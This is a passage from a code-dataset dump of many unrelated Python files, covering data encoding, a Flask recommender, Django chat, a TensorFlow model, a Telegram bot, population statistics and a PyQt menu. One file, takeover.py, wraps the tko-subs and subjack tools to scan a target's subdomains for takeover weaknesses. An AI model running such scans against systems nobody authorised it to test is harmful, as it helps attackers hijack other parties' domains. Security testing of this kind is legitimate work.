le.fit_pd(texts)\n self._textmapping = le.get_params()\n\n self._fitted = True\n\n\n def __encode_column(self, col):\n unary = pd.DataFrame(col)\n for v in self._mapping[col.name]:\n unary[col.name+\"_\"+str(v)] = (col >= v).astype(int)\n return unary.drop(col.name,axis=1)\n\n\n def produce(self, *, inputs: Input, timeout:float = None, iterations: int = None) -> CallResult[Output]:\n \"\"\"\n Convert and output the input data into unary encoded format,\n using the trained (fitted) encoder.\n Value unseen in training_inputs would be rounded to nearest value in training_inputs.\n Missing(NaN) cells in a column one-hot encoded would give\n out a row of all-ZERO columns for the target column.\n \"\"\"\n #if self._target_columns == []:\n # return CallResult(inputs, True, 1)\n\n if not self._fitted:\n raise ValueError('Encoder model not fitted. Use fit()')\n\n if isinstance(inputs, pd.DataFrame):\n data_copy = inputs.copy()\n else:\n data_copy = inputs[0].copy()\n\n set_columns = set(data_copy.columns)\n\n if set_columns != self._all_columns:\n raise ValueError('Columns(features) fed at produce() differ from fitted data.')\n\n data_enc = data_copy[list(self._mapping.keys())]\n data_else = data_copy.drop(self._mapping.keys(),axis=1)\n\n res = []\n for column_name in data_enc:\n col = data_enc[column_name]\n col.is_copy = False\n\n chg_v = lambda x: min(self._mapping[col.name], key=lambda a:abs(a-x)) if x is not None else x\n col[col.notnull()] = col[col.notnull()].apply(chg_v)\n encoded = self.__encode_column(col)\n res.append(encoded)\n\n data_else.drop(self._empty_columns, axis=1, inplace=True)\n if self._text2int:\n texts = data_else.select_dtypes([object])\n le = Label_encoder()\n le.set_params(self._textmapping)\n data_else[texts.columns] = le.transform_pd(texts)\n\n res.append(data_else)\n result = pd.concat(res, axis=1)\n\n return CallResult(result, True, 1)\n","sub_path":"dsbox/datapreprocessing/cleaner/unary_encoder.py","file_name":"unary_encoder.py","file_ext":"py","file_size_in_byte":8822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"614753400","text":"import logging\n\nlogging.basicConfig()\nlogger = logging.getLogger()\nlogger.setLevel('INFO')\n\n\nimport json, time\nfrom gces import tools\nfrom gces import (\n EventSubscriber\n)\n\nfrom celery_app import example_run_subscriber_task\n\ndef example_run_subscriber_function(data):\n pass\n\nTOPIC_NAME = 'gces'\nSUBSCRIBER_NAME = 'gces_example'\n\n\nes = EventSubscriber(TOPIC_NAME, SUBSCRIBER_NAME)\nes.register_fsub('EXAMPLE_RUN_FUNCTION_PROCCESS', example_run_subscriber_function)\nes.register_tsub('EXAMPLE_RUN_TASK_PROCCESS', example_run_subscriber_task)\n\nes.start()\n\nif __name__ == '__main__':\n try:\n while True:\n time.sleep(200)\n except KeyboardInterrupt:\n print('Bye!!!!')\n","sub_path":"examples/task_based_sub/sub.py","file_name":"sub.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"97136793","text":"# -*- coding: utf-7 -*-\nu\"\"\"A module which provides the is_leap_year function .\"\"\"\n\n\ndef is_leap_year(year):\n u\"\"\"Return a boolean indicating if the given year is a learp\n year.\n \"\"\"\n if year % 4 == 0:\n if year % 100 == 0:\n return year % 400 == 0\n return True\n return False\n","sub_path":"all_data/exercism_data/python/leap/018ac9310c554d3a8faddf3859c47987.py","file_name":"018ac9310c554d3a8faddf3859c47987.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"337550660","text":"from flask import Blueprint\nmain = Blueprint('main', __name__)\n \nimport json\nfrom engine import RecommendationEngine\n \nimport logging\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n \nfrom flask import Flask, render_template, request, session, redirect, url_for, Response, send_file\n\n\n@main.route('/',methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n movieName = request.form.get('movieName')\n res = recommendation_engine.queryMovie(movieName)\n return render_template('result.html', moviename = movieName, search_res = res)\n return render_template('search.html') \n\n@main.route('/info/')\ndef movieInfo(movie_id):\n rating = recommendation_engine.get_average_rating_for_movie_id(movie_id)\n #return json.dumps(rating)\n return render_template('details.html',score = round(rating[0][1][1],2),num = rating[0][1][0], movie_id = movie_id)\n\n@main.route(\"//ratings/top/\", methods=[\"GET\"])\ndef top_ratings(user_id, count):\n logger.debug(\"User %s TOP ratings requested\", user_id)\n top_ratings = recommendation_engine.get_top_ratings(user_id,count)\n return render_template('recommendation.html', movies = top_ratings)\n #return json.dumps(top_ratings)\n \n@main.route(\"//ratings/\", methods=[\"GET\"])\ndef movie_ratings(user_id, movie_id):\n logger.debug(\"User %s rating requested for movie %s\", user_id, movie_id)\n ratings = recommendation_engine.get_ratings_for_movie_ids(user_id, [movie_id])\n return json.dumps(ratings)\n #return render_template('details.html',score = rating, movie_id = movie_id)\n\n@main.route(\"//rating/\", methods = [\"POST\"])\ndef add_rating(user_id,movie_id):\n rating = [(user_id, (int)(movie_id), (int)(request.form.get('score')))]\n recommendation_engine.add_ratings(rating)\n return redirect(\"/0/rated\")\n\n@main.route(\"//rated\")\ndef rated(user_id):\n rated_movies = recommendation_engine.get_rated_movies(user_id)\n return render_template('rated.html', rated = rated_movies)\n #return json.dumps(rated_movies)\n \n@main.route(\"//ratings\", methods = [\"POST\"])\ndef add_ratings(user_id):\n # get the ratings from the Flask POST request object\n ratings_list = request.form.keys()[0].strip().split(\"\\n\")\n ratings_list = map(lambda x: x.split(\",\"), ratings_list)\n # create a list with the format required by the negine (user_id, movie_id, rating)\n ratings = map(lambda x: (user_id, int(x[0]), float(x[1])), ratings_list)\n # add them to the model using then engine API\n recommendation_engine.add_ratings(ratings)\n \n return json.dumps(ratings)\n \n\ndef create_app(spark_context, dataset_path):\n global recommendation_engine \n\n recommendation_engine = RecommendationEngine(spark_context, dataset_path) \n \n app = Flask(__name__, static_url_path='/static')\n app.register_blueprint(main)\n return app \n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"440569170","text":"import jwt\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\nfrom django.utils.safestring import mark_safe\nimport json\nfrom user.models import LoggedUser\nfrom user.redis import Redis\nfrom .models import Message\n\nred = Redis()\n\n\ndef index(request):\n \"\"\"\n :param request: request is made by user\n :return: will render token which will be stored in web browser\n \"\"\"\n try:\n token = request.body.decode(\"utf-8\")\n decode = jwt.decode(token, settings.SECRET_KEY)\n username = decode['username']\n user = User.objects.get(username=username)\n # if user is not none then code will run\n if user is not None:\n logged_user = LoggedUser.objects.all().order_by('username')\n userlist = []\n for i in logged_user:\n userlist.append(i.username)\n data = {\n \"token\": token,\n \"username\": user,\n \"userlist\": userlist\n }\n return render(request, 'chat/index.html',data)\n except Exception as e:\n return redirect(\"/session\")\n\n\ndef room(request, room_name):\n \"\"\"\n :param request: user makes a request\n :param room_name: room name is called form index\n :return: will return the chat room page\n \"\"\"\n if request.method == 'POST':\n token = request.body.decode('utf-8')\n decode = jwt.decode(token, settings.SECRET_KEY)\n username = decode['username']\n user = User.objects.get(username=username)\n # if user is not none then code will run\n if user is not None:\n userlist = []\n logged_user = LoggedUser.objects.all().order_by('username')\n for i in logged_user:\n userlist.append(i.username)\n return render(request, 'chat/room.html', {\n 'room_name_json': mark_safe(json.dumps(room_name)),\n 'user': user,\n 'userlist': userlist\n })\n else:\n return redirect(\"/session\")\n else:\n mess = Message.objects.filter(indentifier_message_number=room_name).values('messages')\n m = list(mess)\n return render(request, 'chat/room.html', {\n 'room_name_json': room_name,\n 'messages': mark_safe(json.dumps(m))\n })\n","sub_path":"myapp/chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"534457103","text":"#coding:utf8\nimport sys\nimport os\nimport numpy as np\nimport tensorflow as tf\n\nfrom flags import *\n\nclass DSSM(object):\n\n def __init__(self):\n self._build_model()\n\n def _build_model(self):\n with tf.name_scope('input'):\n # shape : [batch_size, query_length]\n self.query = tf.placeholder(tf.int32, shape=[None, FLAGS.query_length], name=\"query\") \n # shape: [batch_size, doc_length]\n self.doc = tf.placeholder(tf.int32, shape=[None, FLAGS.doc_length], name=\"doc\")\n # shape : [batch_size, 1]\n self.label = tf.placeholder(tf.float32, shape=[None, 1], name='label')\n\n with tf.name_scope('embedding'):\n # shape : [vocab_size, embedding_dim]\n self.embedding = tf.Variable(tf.random_uniform([FLAGS.vocab_size, FLAGS.embedding_dim]), dtype=tf.float32, name=\"embedding\")\n\n # shape: [batch_size, query_length, embedding_dim]\n self.query_embeddings = tf.nn.embedding_lookup(self.embedding, self.query, name=\"query_embeddings\")\n self.doc_embeddings = tf.nn.embedding_lookup(self.embedding, self.doc, name=\"doc_embeddings\")\n\n with tf.name_scope('mask'):\n # mask query input\n self.query_mask = tf.cast(tf.greater(self.query, 0), tf.float32)\n self.query_mask = tf.expand_dims(self.query_mask, axis=2)\n self.query_mask = tf.tile(self.query_mask, (1, 1, FLAGS.embedding_dim))\n self.query_embeddings_mask = tf.multiply(self.query_embeddings, self.query_mask)\n # self.query_embeddings = self.query_embeddings_mask\n\n self.doc_mask = tf.cast(tf.greater(self.doc, 0), tf.float32)\n self.doc_mask = tf.expand_dims(self.doc_mask, axis=2)\n self.doc_mask = tf.tile(self.doc_mask, (1, 1, FLAGS.embedding_dim))\n self.doc_embeddings_mask = tf.multiply(self.doc_embeddings, self.doc_mask)\n\n with tf.name_scope('flatten'):\n # flatten tensor after embedding\n # self.query_flatten = tf.reshape(self.query_embeddings, [-1, FLAGS.query_length * FLAGS.embedding_dim])\n # self.doc_flatten = tf.reshape(self.doc_embeddings, [-1, FLAGS.doc_length * FLAGS.embedding_dim])\n # flatten tensor after embedding and mask empty or default features\n self.query_flatten = tf.reshape(self.query_embeddings_mask, [-1, FLAGS.query_length * FLAGS.embedding_dim])\n self.doc_flatten = tf.reshape(self.doc_embeddings_mask, [-1, FLAGS.doc_length * FLAGS.embedding_dim])\n\n with tf.name_scope('dense_layer_1'):\n # query_flatten * query_w1\n self.query_w1 = tf.Variable(tf.glorot_uniform_initializer()((FLAGS.query_length * FLAGS.embedding_dim, FLAGS.query_layer_1_units)))\n self.query_layer_1 = tf.matmul(self.query_flatten, self.query_w1)\n\n self.doc_w1 = tf.Variable(tf.glorot_uniform_initializer()((FLAGS.doc_length * FLAGS.embedding_dim, FLAGS.doc_layer_1_units)))\n self.doc_layer_1 = tf.matmul(self.doc_flatten, self.doc_w1)\n\n self.query_layer_1_out = tf.nn.relu(self.query_layer_1)\n self.doc_layer_1_out = tf.nn.relu(self.doc_layer_1)\n \n with tf.name_scope('cosine_similarity'):\n self.cosine_similarity = tf.reduce_sum(tf.multiply(self.query_layer_1_out, self.doc_layer_1_out), axis=1, keepdims=True)\n\n with tf.name_scope('score'):\n self.score = tf.nn.sigmoid(self.cosine_similarity)\n\n with tf.name_scope('loss'):\n self.loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=self.score, labels=self.label)\n\n with tf.name_scope('train'):\n self.learning_rate = tf.Variable(FLAGS.learning_rate, trainable=False)\n self.train_step = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss)\n # SGD\n\n def load_model(self, saver, sess, model_path):\n if os.path.exists(model_path + '.index'):\n saver.restore(sess, model_path)\n else:\n raise Exception(\"model_path %s not exist\" % model_path+'.index')\n exit(-1)\n\n def save_model(self, saver, sess, model_path):\n saver.save(sess, model_path)\n\nif __name__ == '__main__':\n dssm = DSSM()\n sys.exit(0)\n","sub_path":"sparse_dnn/dssm/high_order_api/dssm.py","file_name":"dssm.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"400798512","text":"# encoding=utf8\nimport sys \nreload(sys) \nsys.setdefaultencoding('utf8')\n\nimport unirest\nimport json\n\ncredentialsJson = open('credentials.json', 'r')\ncredentials = json.load(credentialsJson)\n\nTOKEN = credentials['tokenbot']\n\nBASE_URL = 'https://api.telegram.org/bot' + TOKEN + '/' \nPOLLING_URL = BASE_URL + \"getUpdates?offset=:offset:&timeout=300\"\n\nclass standardMessage():\n\tdef __init__(self, values):\n\t\tself.update_id = values['update_id']\n\t\ttry:\n\t\t\tself.message = values['message']\n\t\texcept:\n\t\t\tself.message = values['edited_message']\n\t\tself.message_id = self.message.get('message_id')\n\t\tself.date = self.message.get('date')\n\t\tself.text = self.message.get('text')\n\t\tself.fr = self.message.get('from')\n\t\tself.chat = self.message['chat']\n\t\tself.chat_id = self.chat['id']\n\n\tdef replyText(self, msg, reply=False):\n\t\tif not reply:\n\t\t\tself.message_id = 0\n\t\tsend = unirest.post(BASE_URL + 'sendMessage', \n\t\t\tparams={'chat_id': str(self.chat_id),\n\t\t\t\t\t\t'text': msg.encode('utf-8'),\n\t\t\t\t\t\t'reply_to_message_id': str(self.message_id)\n\t\t\t\t\t\t} )\n\n\tdef sendText(self, msg, reply=False):\n\t\tif not reply:\n\t\t\tself.message_id = 0\n\t\tsend = unirest.post(BASE_URL + 'sendMessage', \n\t\t\tparams={'chat_id': str(self.chat_id),\n\t\t\t\t\t\t'text': msg.encode('utf-8'),\n\t\t\t\t\t\t} )","sub_path":"src/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"421388502","text":"# population.py\r\n# AUTHOR NAME\r\n#\r\n# A terminal-based application for computing and printing statistics based on given input.\r\n# Detailed specifications are provided via the Assignment 5 git repository.\r\n# You must include the main listed below. You may add your own additional classes, functions, variables, etc. \r\n# You may import any modules from the standard Python library, including numpy and pandas.\r\n# Remember to include docstrings and comments.\r\n\r\n## Import librairies\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nimport matplotlib.pyplot as plt\r\npd.set_option(\"display.max_columns\", None)\r\n\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\ndef main():\r\n\r\n # Stage 1: Import data\r\n\r\n\r\n ## Import data\r\n codes = pd.read_excel(\"UN Population Datasets/UN Codes.xlsx\",sheet_name=\"world_data\")\r\n population_dataset1 = pd.read_excel(\"UN Population Datasets/UN Population Dataset 1.xlsx\",sheet_name=\"Pop Growth Stats\")\r\n population_dataset2 = pd.read_excel(\"UN Population Datasets/UN Population Dataset 2.xlsx\",sheet_name=\"Pop Growth Cities\")\r\n # Data pre-processing\r\n data1=pd.pivot_table(population_dataset1, values='Value', index=['Region/Country/Area','Year'],columns=['Series'], aggfunc=np.sum)\r\n data1=data1.reset_index(level=['Region/Country/Area','Year'],drop=False)\r\n data1.dropna(subset=['Year'])\r\n\r\n data2=pd.pivot_table(population_dataset2, values='Value', index=['Region/Country/Area','Year'],columns=['Series'], aggfunc=np.sum)\r\n data2=data2.reset_index(level=['Region/Country/Area','Year'],drop=False)\r\n data2.dropna(subset=['Year'])\r\n\r\n # Merge datasets\r\n print(\"codes shape\",codes.shape[0])\r\n print(\"data1 shape\",data1.shape[0])\r\n print(\"data2 shape\",data2.shape[0])\r\n countries_stats1=pd.merge(codes, data1, left_on='Country',right_on='Region/Country/Area', how='inner', suffixes=('', '_drop'))\r\n countries_stats1=countries_stats1.drop(['Region/Country/Area'], axis=1)\r\n print(\"countries_stats1 shape\",countries_stats1.shape[0])\r\n countries_stats=pd.merge(countries_stats1, data2, left_on=['Country','Year'],right_on=['Region/Country/Area','Year'], how='inner', suffixes=('', '_drop'))\r\n countries_stats=countries_stats.drop(['Region/Country/Area'], axis=1)\r\n countries_stats.dropna(subset=['Year'])\r\n print(\"countries_stats shape\",countries_stats.shape[0])\r\n # set hierarchical index 'UN Region', 'UN Sub-Region','Year'\r\n index = pd.MultiIndex.from_frame(countries_stats[['UN Region', 'UN Sub-Region','Year']])\r\n countries_stats.set_index(index,inplace=True)\r\n idx = pd.IndexSlice\r\n countries_stats=countries_stats.sort_index()\r\n\r\n # Describe combined dataset\r\n print(\"\\n Description of dataset: \\n\")\r\n print(countries_stats.describe())\r\n\r\n # Print Average statistics per region and year using aggregation with the mean function\r\n print(\"\\n Average statistics per region and year: \\n \")\r\n countries_stats_=countries_stats.drop(['Year','UN Region'], axis=1)\r\n print(countries_stats_.groupby(['UN Region', 'Year']).mean())\r\n\r\n\r\n # Plot Population annual rate of increase (percent) for each region\r\n p1 = pd.pivot_table(countries_stats_, values='Population annual rate of increase (percent)', index=['UN Region', 'Year'],\r\n aggfunc=np.mean)\r\n p1=p1.reset_index()\r\n print(p1)\r\n fig = plt.figure()\r\n ax = fig.add_axes([0, 0, 1, 1])\r\n ax.bar( p1['UN Region'], p1['Population annual rate of increase (percent)'], color='b')\r\n ax.set_ylabel('Annual Rate')\r\n ax.set_title('Population annual rate of increase (percent)')\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.88)\r\n plt.savefig('books_read.png',bbox_inches='tight')\r\n\r\n # Count Missing values per columns of the combined dataset\r\n print(\"\\n Count Missing Values per columns \\n \")\r\n print(countries_stats.isnull().sum())\r\n\r\n # Add new variable popo_decrease to define countries that have negatif Population annual rate of increase (percent)\r\n countries_stats['pop_decrease']= countries_stats.eval('`Population annual rate of increase (percent)`<0').astype(int)\r\n # Add new variable females_lives_more_than_males to define countries that have negatif Life expectancy at birth for females (years)`>`Life expectancy at birth for males (years)\r\n countries_stats['females_lives_more_than_males']= countries_stats.eval('`Life expectancy at birth for females (years)`>`Life expectancy at birth for males (years)`').astype(int)\r\n\r\n # Liste of countries where their population decrease per region and year\r\n print('Number of countries where their population decrease')\r\n countries_stats_=countries_stats.drop(['Year','UN Region'], axis=1)\r\n print(countries_stats_[countries_stats_['pop_decrease']==1].groupby(['UN Region','Year']).count()['pop_decrease'])\r\n\r\n # Liste of countries where males lives than females per region and year\r\n print('Number of countries where males lives than females')\r\n print(countries_stats_[countries_stats_['females_lives_more_than_males']==0].groupby(['UN Region', 'Year']).count()['females_lives_more_than_males'])\r\n\r\n\r\n #Define function region_valid to raise error when the sub-region doesn't exist\r\n def region_valide(sub_region):\r\n if sub_region not in countries_stats['UN Sub-Region'].unique():\r\n raise ValueError(\"You must enter a valid UN sub-region name\")\r\n\r\n #Using the while functionality, the user can enter many time the sub-region name until he enter a valid name\r\n sub_region = None\r\n while sub_region is None:\r\n input_value = str(input(\"Please enter a sub-region name: \"))\r\n try:\r\n # try and convert the string input to a number\r\n region_valide(input_value)\r\n sub_region=input_value\r\n except ValueError:\r\n # tell the user off\r\n print(\"You must enter a valid UN sub-region name\".format(input=input_value))\r\n\r\n print(\"\\n\")\r\n print(\"The dataset contain informations of these years: \" ,countries_stats['Year'].unique())\r\n # Define function year_valid to raise error when the year s not valid doesn't exist or not integer type\r\n def year_valide(user_year):\r\n if int(user_year) not in countries_stats['Year'].unique() or not isinstance(user_year,int):\r\n raise ValueError(\"You must enter a valid year\")\r\n\r\n # Using the while functionality, the user can enter many time the year until he enter a valid name\r\n\r\n year = None\r\n\r\n while year is None:\r\n input_year = input(\"Please enter a year: \")\r\n try:\r\n input_year=int(input_year)\r\n year_valide(input_year)\r\n year = input_year\r\n except ValueError:\r\n # tell the user off\r\n print(\"You must enter a valid year\".format(input=input_year))\r\n\r\n ## Select data concerning the sub region and the chosen year\r\n regions_stats=countries_stats.loc[idx[:,sub_region,year],:]\r\n\r\n # Print average statistics of the sub_region in the chosen year\r\n print('\\n')\r\n print(\"Average Statistics of sub region {} in {}:\".format(sub_region,year))\r\n print(\"\\n\")\r\n print(regions_stats.iloc[:,4:].mean())\r\n\r\n # Print 3 countries with the lower rate fertility in the region\r\n print(\"\\n 3 countries with the lower rate fertility in the region \\n\")\r\n regions_stats_ = regions_stats.drop(['Year', 'UN Region'], axis=1)\r\n print(regions_stats_.nsmallest(3, 'Total fertility rate (children per women)')[['Country','Total fertility rate (children per women)']])\r\n\r\n # Print Top 3 countries with the best rate fertility in the region\r\n print(\"\\n Top 3 countries with the best Life expectancy at birth in the region \\n\")\r\n regions_stats_ = regions_stats.drop(['Year', 'UN Region'], axis=1)\r\n print(regions_stats_.nlargest(3, 'Life expectancy at birth for both sexes (years)')[['Country','Life expectancy at birth for both sexes (years)']])\r\n\r\n\r\n # Export countries_stats dataframe\r\n countries_stats.to_excel(\"countries_stats.xlsx\")\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n","sub_path":"Population-vf.py","file_name":"Population-vf.py","file_ext":"py","file_size_in_byte":8090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"240906112","text":"import os, time\nfrom core import execute\nfrom core import slack\nfrom core import utils\n\nfrom pprint import pprint \n\nclass TakeOverScanning(object):\n def __init__(self, options):\n utils.print_banner(\"Scanning for Subdomain TakeOver\")\n self.module_name = self.__class__.__name__\n self.options = options\n slack.slack_noti('status', self.options, mess={\n 'title': \"{0} | {1}\".format(self.options['TARGET'], self.module_name),\n 'content': 'Start Scanning TakeOver for {0}'.format(self.options['TARGET'])\n })\n self.initial()\n utils.just_waiting(self.module_name)\n\n self.conclude()\n slack.slack_noti('good', self.options, mess={\n 'title': \"{0} | {1} \".format(self.options['TARGET'], self.module_name),\n 'content': 'Done Scanning TakeOver for {0}'.format(self.options['TARGET'])\n })\n\n\n def initial(self):\n if self.options['DEBUG'] == \"True\":\n self.tko_subs()\n else:\n self.tko_subs()\n self.subjack()\n\n def tko_subs(self):\n utils.print_good('Starting tko-subs')\n cmd = '$GO_PATH/tko-subs -data $PLUGINS_PATH/providers-data.csv -domains $WORKSPACE/subdomain/final-$TARGET.txt -output $WORKSPACE/subdomain/takeover-$TARGET-tko-subs.txt'\n\n cmd = utils.replace_argument(self.options, cmd)\n output_path = utils.replace_argument(self.options, '$WORKSPACE/subdomain/takeover-$TARGET-tko-subs.txt')\n std_path = utils.replace_argument(self.options, '$WORKSPACE/subdomain/std-takeover-$TARGET-tko-subs.std')\n execute.send_cmd(cmd, output_path, std_path, self.module_name)\n\n\n def subjack(self):\n utils.print_good('Starting subjack')\n cmd = '$GO_PATH/subjack -w $WORKSPACE/subdomain/final-$TARGET.txt -t 100 -timeout 30 -o $WORKSPACE/subdomain/takeover-$TARGET-subjack.txt -ssl'\n\n cmd = utils.replace_argument(self.options, cmd)\n output_path = utils.replace_argument(self.options, '$WORKSPACE/subdomain/takeover-$TARGET-subjack.txt')\n std_path = utils.replace_argument(self.options, '$WORKSPACE/subdomain/std-takeover-$TARGET-subjack.std')\n execute.send_cmd(cmd, output_path, std_path, self.module_name)\n\n\n #update the main json file\n def conclude(self):\n\n main_json = utils.reading_json(utils.replace_argument(self.options, '$WORKSPACE/$COMPANY.json'))\n main_json['Modules'][self.module_name] = utils.checking_done(module=self.module_name, get_json=True)\n\n #write that json again\n utils.just_write(utils.replace_argument(self.options, '$WORKSPACE/$COMPANY.json'), main_json, is_json=True)\n \n #logging\n logfile = utils.replace_argument(self.options, '$WORKSPACE/log.json')\n utils.save_all_cmd(logfile)\n utils.print_banner(\"{0} Done\".format(self.module_name))\n\n\n\n\n\n","sub_path":"modules/takeover.py","file_name":"takeover.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"344254277","text":"#!/usr/bin/python3\n\nfrom xml.sax.handler import ContentHandler\nfrom xml.sax import make_parser\nimport sys\nimport urllib.request\n\nclass myContentHandler(ContentHandler):\n\n def __init__ (self):\n self.inItem = False\n self.inContent = False\n self.theContent = \"\"\n self.file = open(\"contenidos.html\", \"w\")\n self.line = \"\"\n\n def startElement (self, name, attrs):\n if name == 'item':\n self.inItem = True\n elif self.inItem:\n if name == 'title':\n self.inContent = True\n elif name == 'link':\n self.inContent = True\n \n def endElement (self, name):\n if name == 'item':\n self.inItem = False\n elif self.inItem:\n if name == 'title':\n self.line = \"Titulo de la noticia: \" + self.theContent + \".\"\n # To avoid Unicode trouble\n print (self.line)\n self.file.write(self.line)\n self.inContent = False\n self.theContent = \"\"\n elif name == 'link':\n self.link = self.theContent\n links = \"

Enlace noticia: \" + self.link + \"

\\n\"\n print (links)\n self.file.write(links)\n self.inContent = False\n self.theContent = \"\"\n self.link = \"\"\n\n def characters (self, chars):\n if self.inContent:\n self.theContent = self.theContent + chars\n\n \n# --- Main prog\n\ntheParser = make_parser()\ntheHandler = myContentHandler()\ntheParser.setContentHandler(theHandler)\n\nurl = \"http://barrapunto.com/index.rss\"\nxmlStream = urllib.request.urlopen(url)\ntheParser.parse(xmlStream)\n\nprint (\"Parse complete\")","sub_path":"xml-parser-barrapunto.py","file_name":"xml-parser-barrapunto.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"445886135","text":"from PyQt4.QtGui import *\r\nfrom PyQt4 import QtGui\r\nfrom PyQt4.QtCore import *\r\nimport shutil\r\n\r\n\r\nfrom profile_sql_connections import *\r\n\r\nclass Menu(QMenu):\r\n \"\"\"A class to represent the menu bar for the profile\"\"\"\r\n def __init__(self,parent):\r\n super().__init__()\r\n self.parent=parent\r\n self.MenuBar=QMenuBar()\r\n #create actions\r\n\r\n self.change_picture=QAction(\"Change Picture\",self)\r\n\r\n self.add_trick=QAction(\"Add Trick\", self)\r\n\r\n self.add_skatepark=QAction(\"Add Skatepark\",self)\r\n\r\n self.add_review=QAction(\"Add Review\",self)\r\n\r\n self.contact_support=QAction(\"Contact Support\",self)\r\n\r\n\r\n \r\n #create options\r\n self.profile_menu=self.MenuBar.addMenu(\"Profile\")\r\n self.tricks_menu=self.MenuBar.addMenu(\"Tricks\")\r\n self.skateparks_menu=self.MenuBar.addMenu(\"Skateparks\")\r\n self.reviews_menu=self.MenuBar.addMenu(\"Reviews\")\r\n self.support_menu=self.MenuBar.addMenu(\"Support\")\r\n \r\n\r\n #add actions to menu\r\n\r\n self.profile_menu.addAction(self.change_picture)\r\n\r\n self.tricks_menu.addAction(self.add_trick)\r\n\r\n self.skateparks_menu.addAction(self.add_skatepark)\r\n\r\n self.reviews_menu.addAction(self.add_review)\r\n\r\n self.support_menu.addAction(self.contact_support)\r\n\r\n #connections\r\n\r\n self.change_picture.triggered.connect(self.change_picture_connection)\r\n self.add_trick.triggered.connect(self.add_trick_connection)\r\n self.add_skatepark.triggered.connect(self.add_skatepark_connection)\r\n self.add_review.triggered.connect(self.add_review_connection)\r\n self.contact_support.triggered.connect(self.contact_support_connection)\r\n\r\n\r\n def contact_support_connection(self):\r\n self.parent.tabs.setCurrentIndex(4)\r\n print(\"Contact Support\")\r\n\r\n def add_review_connection(self):\r\n self.parent.tabs.setCurrentIndex(3)\r\n self.parent.reviews_tab.add_review_stacked()\r\n print(\"add Trick\")\r\n\r\n\r\n def change_picture_connection(self):\r\n self.parent.StatusBar.showMessage(\"Changing Profile Picture...\")\r\n self.parent.tabs.setCurrentIndex(0)\r\n print(\"Find Picture\")\r\n path=QFileDialog.getOpenFileName()\r\n \r\n if path==\"\":\r\n print(\"Picture not changed.\")\r\n self.parent.StatusBar.showMessage(\"Profile Picture Not Changed.\",2000)\r\n else:\r\n replace=\"\\.\"\r\n path=path.replace(\"/\",replace[0])\r\n destination=(\"{0}{1}{2}\".format(os.getcwd(),replace[0],\"ProfilePicture.jpeg\"))\r\n print(destination)\r\n print(path)\r\n shutil.copy2(path,destination)\r\n self.connection=ProfileSQLConnections()\r\n self.connection.change_picture(destination)\r\n print(path)\r\n self.parent.StatusBar.showMessage(\"Profile Picture Successfully Changed.\",2000)\r\n\r\n def add_trick_connection(self):\r\n self.parent.tabs.setCurrentIndex(1)\r\n self.parent.tricks_tab.add_trick_stacked()\r\n print(\"add Trick\")\r\n\r\n def add_skatepark_connection(self):\r\n self.parent.tabs.setCurrentIndex(2)\r\n self.parent.skateparks_tab.view_add_skatepark()\r\n \r\n \r\n\r\n\r\n\r\n","sub_path":"Implementation/Development/menu_bar.py","file_name":"menu_bar.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"310854210","text":"#!/usr/bin/env python\r\n'''\r\ndelegatorsListing b0.09\r\n'''\r\n\r\n# Import librarys\r\n# ------------------------------------------------------------------------------\r\nimport csv\r\nimport time\r\nimport json\r\nimport urllib.request\r\nfrom collections import defaultdict\r\nfrom concurrent.futures import ThreadPoolExecutor\r\nfrom datetime import datetime\r\nfrom time import time\r\ntry:\r\n import winsound\r\nexcept ImportError:\r\n # Fake winsound lets you call Beep/PlaySound/MessageBeep without doing anything/ intersting thanks\r\n winsound = type('', (), {'__getattr__': lambda *a: lambda *a, **kw: None})()\r\n\r\n\r\nENDPOINTS = {\r\n 'profile': 'https://tradescan.switcheo.org/get_profile?account=%s',\r\n 'validators': 'https://tradescan.switcheo.org/get_all_validators',\r\n 'validator_delegations': 'https://tradescan.switcheo.org/staking/validators/%s/delegations'\r\n}\r\n\r\n\r\ndef get_json(url):\r\n with urllib.request.urlopen(url) as req:\r\n return json.loads(req.read().decode())\r\n\r\n\r\ndef get_profile(k_v):\r\n addr, total = k_v\r\n total = int(total / 100000000)\r\n payload = get_json(ENDPOINTS['profile'] % addr)\r\n last_seen = datetime.fromisoformat(payload['last_seen_time'][:19])\r\n return [addr, last_seen, total]\r\n\r\n\r\n# Init time\r\n# ------------------------------------------------------------------------------\r\ninitTime = int(time())\r\n\r\n# Get all delegators from all bonded validators\r\n# ------------------------------------------------------------------------------\r\nvalidators = [d for d in 